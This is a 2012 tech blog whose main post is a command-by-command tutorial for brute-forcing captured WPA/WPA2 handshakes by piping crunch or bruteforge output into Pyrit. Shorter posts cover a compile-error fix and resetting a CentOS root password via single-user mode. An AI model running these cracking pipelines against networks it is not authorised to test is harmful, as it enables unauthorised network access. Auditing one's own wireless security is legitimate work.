Thursday, 31 May 2012

x86_64 Linux Error: gnu/stub-32.h missing error and solution


[root@localhost crunch3.2]# make
Building binary...
/usr/bin/gcc -Wall -lm -pthread -std=c99 -m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 crunch.c -o crunch
In file included from /usr/include/features.h:352,
                 from /usr/include/assert.h:36,
                 from crunch.c:225:
/usr/include/gnu/stubs.h:7:27: error: gnu/stubs-32.h: No such file or directory
make: *** [crunch] Error 1

[root@localhost crunch3.2]# yum -y install glibc-devel

How do I fix this error?
yum -y install glibc-devel

Tuesday, 29 May 2012

WPA/WPA2 Brute Forcing


So what are you going to do if your word list does not have the password?
Here is a how-to for cracking the WPA/WPA2 by brute forcing on the-fly.

First of all make sure you have your wpa handshake that you have have acquired from the AP by using the aircrack-ng suit.

We will be using Pyrit; http://code.google.com/p/pyrit/ for most of our work here.
Pyrit allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. It has CUDA and Opencl support, which we can use our more powerfull and cheaper GPU that are at most 100 times faster than the CPU

Lets install the needed packages first:
Code:
sudo apt-get install subversion python-dev libssl-dev zlib1g-dev

Now Lets Compile the latest SVN of Pyrit:
Code:
sudo svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
cd pyrit-read-only/pyrit
sudo python setup.py build
sudo python setup.py install

If you have an NVidia or ATi gpu make sure you compile the extension modules as well 

A good thing to do first is strip all the unnessary packets that are in the .cap file 
this would make the cracking much faster if the original .cap file was large
Code:
pyrit -r "large_dumps_*.pcap" -e MyNetwork -o tiny_dump_MyNetwork.cap strip


Now we compile a program called crunch:
Code:
wget http://www.darkc0de.com/c0de/c/crunch.txt -O crunch.c
gcc -c crunch.c
gcc -lm -o crunch crunch.o

crunch will do an stdout, so you can pipe results into pyrit

Now we are all ready to do some cracking, so make you sure you run these next examples from the place you compiled crunch!
Examples:
Code:
./crunch 8 8 0123456789 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This would generate every numeric combination using numbers 0-9 with a length of 8
Code:
./crunch 8 8 abcdefghijklmnopqrstuvwxyz | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above but using lower case letters

Lets say you know the password is admin and 3 unknown numbers, so here is what you do: 
Code:
./crunch 8 8 0123456789 -t admin@@@ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

so only those @' will change with every number combo

Here is an example to use all from length 8 to 63 (lol)
Code:
./crunch 8 63 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough


To bad crunch lacks the special characters (?!"#$%&'()*+,-./:;<=>?[\]^_`{|}~)
There is another alternative program called bruteforge: http://masterzorag.blogspot.com/
This program has more options, but bruteforge does NOT compute all chars combinations, it skips ahead when a condition is verified; 
Get:
Code:
wget http://mz03.netfirms.com/py/bruteforge -O bruteforge.py


Examples: 
Code:
python bruteforge.py bruteforge -c 2 -a 00000000 -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This will generate a numeric string from len 8 to 9 
Code:
python bruteforge.py bruteforge -a aaaaaaaa -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above but using lower case letters

Notes: You can compute with all characters by using the -c 6 function with bruteforge, also you use the import_passwords instead of attack_passthrough for inserting generated strings into a database you have created with pyrit
example: 
Code:
python bruteforge.py bruteforge -a aaaaaaaa | pyrit  -i - import_passwords


Conclusion:
Well you can compute every possible combination, but it will just take time. This tutorial is just a demo, don't try this at home unless you have performance of a petaflop

Resetting forgotten root password on CentOS


Boot the system and when you see the following screen, press any key





At the following screen, press e



It will take you the following screen



Highlight the line with vmlinuz in it by using the arrow keys and press e. The next screen will look like below




Now type single or init 1 at the very end of the line so.



Then press enter and b to boot the system with the new argument
The system will boot into single user mode and you will see bash prompt like below



Now change the password
 passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
type in the new password and then reboot

reboot

to restart the system.